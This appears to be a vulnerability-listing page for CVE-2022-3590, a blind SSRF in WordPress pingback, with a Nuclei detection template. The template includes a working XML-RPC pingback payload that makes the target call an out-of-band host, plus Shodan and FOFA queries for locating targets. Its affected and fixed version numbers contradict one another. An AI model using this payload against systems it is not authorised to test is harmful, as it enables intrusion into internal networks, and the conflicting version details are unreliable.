| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 2023 13:06 | – | githubexploit |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 8 Aug 2024 03:02 | – | githubexploit |
| Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Wordpress | 12 Jun 2023 13:06 | – | githubexploit |
| CVE-2022-3590 | 14 Dec 2022 12:27 | – | circl |
| WordPress Code Issue Vulnerability | 14 Dec 2022 00:00 | – | cnnvd |
| CVE-2022-3590 | 14 Dec 2022 08:33 | – | cve |
| CVE-2022-3590 WP <= 6.1.1 - Unauthenticated Blind SSRF via DNS Rebinding | 14 Dec 2022 08:33 | – | cvelist |
| CVE-2022-3590 | 14 Dec 2022 08:33 | – | debiancve |
| CVE-2022-3590 | 14 Dec 2022 09:15 | – | nvd |
| WordPress <= 6.4.1 SSRF Vulnerability | 15 Dec 2022 00:00 | – | openvas |

```yaml
id: CVE-2022-3590

info:
  name: WordPress <= 6.2 - Server Side Request Forgery
  author: riteshs4hu
  severity: medium
  description: |
    WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden.
  impact: |
    Unauthenticated attackers can exploit a race condition in the WordPress pingback feature to perform blind SSRF attacks, potentially accessing internal network resources, cloud metadata endpoints, or other restricted internal services that are explicitly forbidden by validation checks.
  remediation: |
    Update WordPress to version 6.0.3 or later that properly handles TOCTOU race conditions in the pingback feature.
  reference:
    - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
    - https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2022-3590
    cwe-id: CWE-367
    epss-score: 0.0315
    epss-percentile: 0.86326
    cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wordpress
    product: wordpress
    shodan-query:
      - cpe:"cpe:2.3:a:wordpress:wordpress"
      - http.component:"wordpress"
    fofa-query: body="oembed" && body="wp-"
  tags: cve,cve2022,wordpress,wpscan,ssrf,oast,oob,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: regex
        part: body
        regex:
          - 'WordPress\s+(?:[1-5]\.\d+(?:\.\d+)?|6\.[0-2](?:\.\d+)?)'
        internal: true

  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <?xml version="1.0"?>
        <methodCall>
          <methodName>pingback.ping</methodName>
          <params>
            <param>
              <value><string>http://{{interactsh-url}}/</string></value>
            </param>
            <param>
              <value><string>{{RootURL}}/?p=1</string></value>
            </param>
          </params>
        </methodCall>

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(body, '<methodResponse>','faultCode','<fault>')"
          - "contains(content_type, 'text/xml')"
          - "contains(interactsh_protocol, 'dns')"
        condition: and
# digest: 4a0a00473045022100ce552b2e9babc947c0d861c9ad2761744df4ad27f976dcdda3b015b283d8f25c0220763637d6f069ad6add6e062286e2407cdb441025344cf62f2be04c3a233ccb5c:922c64590222798bb761d5b6d8e72950
```